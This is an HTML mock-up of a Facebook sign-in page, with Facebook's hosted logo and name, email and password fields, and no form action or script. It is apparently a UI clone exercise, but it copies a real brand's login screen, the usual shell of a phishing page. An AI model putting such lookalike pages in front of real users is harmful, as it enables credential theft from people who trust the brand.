<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link rel="stylesheet" href="/stylesheet/landing.css" />
    <title>Facebook - Login</title>
  </head>
  <body>
    <div class="main">
      <div class="logo">
        <img
          src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg"
          alt=""
        />
      </div>
      <div class="container">
        <span class="login">Sign In to Facebook</span>
        <input  type="name" name="name" id="name" placeholder="Name" />
        <input
          type="email"
          name="email"
          id="email"
          placeholder="Email address or phone number"
        />
        <input  type="password" name="pass" id="pass" placeholder="Password" />
        <button class="login-btn">Sign In</button>
        <input type="checkbox" class="smallCheckbox"><a>Remember Me </a></label>
        <div class="style">or</div>
        <p>Already have an account?<a href ="/">login</a></p>
      </div>
    </div>
  </body>
</html>
